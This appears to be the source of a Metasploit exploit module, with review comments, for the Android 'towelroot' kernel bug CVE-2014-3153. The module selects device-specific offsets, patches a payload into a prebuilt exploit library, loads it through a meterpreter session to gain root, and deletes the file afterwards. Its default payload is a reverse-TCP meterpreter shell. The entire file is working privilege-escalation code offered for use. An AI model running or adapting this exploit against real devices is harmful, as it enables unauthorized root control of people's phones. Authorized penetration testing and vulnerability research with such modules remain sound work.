GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/android/local/futex_requeue.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Android local privilege escalation via CVE-2014-3153 (futex_requeue),
  # the bug behind "towelroot". The native exploit is a prebuilt shared
  # object shipped in the framework data directory; #exploit patches the
  # payload and a per-target configuration block into it, writes it to the
  # session's working directory and loads it through meterpreter.
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  # Runs #check ahead of #exploit (framework AutoCheck behaviour).
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata. The per-target option hashes ('new_samsung',
  # 'iovstack', 'offset', 'force_remove') are exactly the values #exploit
  # packs into the configuration block of the native library. Their order
  # in 'Targets' matters: #exploit selects them by numeric index.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",
          'Description' => %q{
            This module exploits a bug in futex_requeue in the Linux kernel, using
            similar techniques employed by the towelroot exploit. Any Android device
            with a kernel built before June 2014 is likely to be vulnerable.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Pinkie Pie', # discovery
            'geohot', # towelroot
            'timwr' # metasploit module
          ],
          'References' => [
            [ 'CVE', '2014-3153' ],
            [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
            [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],
          ],
          'DisclosureDate' => '2014-05-03',
          'SessionTypes' => [ 'meterpreter' ],
          'Platform' => [ "android", "linux" ],
          # 'Space' bounds the payload placeholder that #exploit patches into the .so.
          'Payload' => { 'Space' => 2048, },
          'DefaultOptions' => {
            # Matches the final "Waiting ... seconds for payload" step in #exploit.
            'WfsDelay' => 300,
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
          },
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'SideEffects' => [],
            'Reliability' => [],
            'AKA' => ['towelroot'] },
          'DefaultTarget' => 0,
          # Index 0 is the auto-detect pseudo-target; indices 1..4 are the
          # concrete configurations referenced as targets[1..4] in #exploit.
          'Targets' => [
            # Automatic targetting via getprop ro.build.model
            ['Automatic Targeting', { 'auto' => true }],

            # This is the default setting, Nexus 4, 5, 7, etc
            [
              'Default',
              {
                'new_samsung' => false,
                'iovstack' => 2,
                'offset' => 0,
                'force_remove' => false,
              }
            ],

            # Samsung devices, S3, S4, S5, etc
            [
              'New Samsung',
              {
                'new_samsung' => true,
                'iovstack' => 2,
                'offset' => 7380,
                'force_remove' => true,
              }
            ],

            # Older Samsung devices, e.g the Note 2
            [
              'Old Samsung',
              {
                'new_samsung' => false,
                'iovstack' => 1,
                'offset' => 0,
                'force_remove' => true,
              }
            ],

            # Samsung Galaxy Grand, etc
            [
              'Samsung Grand',
              {
                'new_samsung' => false,
                'iovstack' => 5,
                'offset' => 0,
                'force_remove' => true,
              }
            ],
          ],
          # Meterpreter commands #exploit relies on: load_library, file rm, getwd.
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                core_loadlib
                stdapi_fs_delete_file
                stdapi_fs_getwd
              ]
            }
          },
        }
      )
    )
  end

  # Vulnerability check based solely on the Android release version.
  #
  # Any release below 4.5.0 is reported as likely affected. This is a
  # heuristic -- the description ties the bug to the kernel build date,
  # which is not inspected here -- hence CheckCode::Appears rather than
  # Vulnerable.
  #
  # NOTE(review): an empty or non-numeric getprop result is handed to
  # Rex::Version.new without a guard -- confirm how that case behaves.
  #
  # @return [Msf::Exploit::CheckCode] Safe when the release is >= 4.5.0,
  #   Appears otherwise
  def check
    os = cmd_exec("getprop ro.build.version.release")
    unless Rex::Version.new(os) < Rex::Version.new('4.5.0')
      vprint_error "Android version #{os} does not appear to be vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Android version #{os} appears to be vulnerable"

    CheckCode::Appears
  end

  # Select a target, patch the prebuilt exploit library and load it.
  #
  # With the 'Automatic Targeting' target the device is classified by
  # `getprop ro.build.product` against the product lists below; an
  # unrecognised product falls back to 'Default'. The `targets[n]` indices
  # must stay in step with the 'Targets' array in #initialize.
  #
  # Two in-place substitutions are made on the library bytes: the payload
  # placeholder (four 0x90 bytes followed by zero padding up to `space`) and
  # the "c0nfig" marker (replaced with four packed 32-bit integers). gsub!
  # returns nil when a marker is absent and that result is not checked, so a
  # library without the markers would be written and loaded unpatched.
  #
  # @return [void]
  def exploit
    if target['auto']
      product = cmd_exec("getprop ro.build.product")
      fingerprint = cmd_exec("getprop ro.build.fingerprint")
      print_status("Found device: #{product}")
      print_status("Fingerprint: #{fingerprint}")

      if [
        "mako",
        "m7",
        "hammerhead",
        "grouper",
        "Y530-U00",
        "G6-U10",
        "g2",
        "w7n",
        "D2303",
        "cancro",
      ].include? product
        my_target = targets[1] # Default
      elsif [
        "klte", # Samsung Galaxy S5
        "jflte", # Samsung Galaxy S4
        "d2vzw" # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
      ].include? product
        my_target = targets[2] # New Samsung
      elsif [
        "t03g",
        "m0",
      ].include? product
        my_target = targets[3] # Old Samsung
      elsif [
        "baffinlite",
        "Vodafone_785",
      ].include? product
        my_target = targets[4] # Samsung Grand
      else
        # Unknown product: proceed with the Default configuration.
        print_status("Could not automatically target #{product}")
        my_target = targets[1] # Default
      end
    else
      my_target = target
    end

    print_status("Using target: #{my_target.name}")

    # Prebuilt native library from the framework data directory, read as raw bytes.
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-3153.so")
    exploit_data = File.read(local_file, mode: 'rb')

    # Substitute the exploit shellcode with our own
    # NOTE(review): the trailing 0x90 pad is sized (payload length - space);
    # presumably payload.encoded is already padded up to `space` by the
    # framework so this is normally empty, but a shorter payload would make
    # String#* raise on a negative count -- confirm.
    space = payload_space
    payload_encoded = payload.encoded
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

    # Apply the target config
    # Boolean knobs are encoded as -1 (all bits set) or 0; the two integer
    # knobs are taken as-is. Packed as four native-endian unsigned 32-bit
    # values in the order new_samsung, iovstack, offset, force_remove.
    offsets = my_target.opts
    config_buf = [
      offsets['new_samsung'] ? -1 : 0,
      offsets['iovstack'].to_i,
      offsets['offset'].to_i,
      offsets['force_remove'] ? -1 : 0,
    ].pack('I4')
    exploit_data.gsub!("c0nfig" + "\x00" * 10, config_buf)

    # Random 5-char lowercase filename inside the session's current directory.
    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    # The patched copy was already written above, so UploadLibrary is off;
    # presumably the library is loaded from TargetFilePath -- verify against
    # the meterpreter load_library semantics.
    session.core.load_library(
      'LibraryFilePath' => local_file,
      'TargetFilePath' => remote_file,
      'UploadLibrary' => false,
      'Extension' => false,
      'SaveToDisk' => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    # Remove the on-disk copy once it has been loaded.
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
end